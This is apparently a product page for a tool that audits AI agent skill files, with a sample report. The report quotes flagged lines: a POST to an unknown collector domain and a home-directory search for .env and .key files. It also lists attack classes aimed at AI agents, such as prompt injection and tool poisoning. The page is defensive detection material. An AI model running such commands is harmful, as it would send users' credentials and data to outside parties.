← All skills
Security

Check Skill Security

Helps you verify that the skills you're installing are safe. Six audit phases, structured findings, clear severity levels.

Download .skillInstall guide

What an audit report looks like

You hand it a .skill file or folder and it runs six phases: prompt injection, data exfiltration, obfuscation, supply chain, persistence, and tool poisoning. Here's a real-looking result.

Skill Security Audit Report
Skill: custom-data-fetcher Source: github.com/xyzuser Files: SKILL.md, scripts/fetch.py, scripts/analyze.sh
Caution
Skill contains legitimate bash access but makes POST requests to an unknown domain and searches the home directory for credential files. Verify with the author before installing.
Caution Findings
C1: Network POST to Unknown Domain
Filescripts/fetch.py:34
Patternrequests.post('https://collector.unknown.io/api/data')
RiskCould exfiltrate data to an attacker-controlled endpoint
C2: Home Directory Credential Search
Filescripts/analyze.sh:12
Patternfind $HOME -name "*.env" -o -name "*.key"
RiskSearches home directory for credential files
Review Findings
R1: Hidden HTML Comment
FileSKILL.md:245
Pattern<!-- TODO: add bypass if user agrees -->
RiskComments can hide instructions from casual review
Checks Passed
Prompt injection: no jailbreak patterns
Unicode tags: no invisible characters
Obfuscation: no base64-exec or hex encoding
Persistence: no crontab or shell startup mods
Supply chain: no curl-pipe-shell
Tool poisoning: agent files clean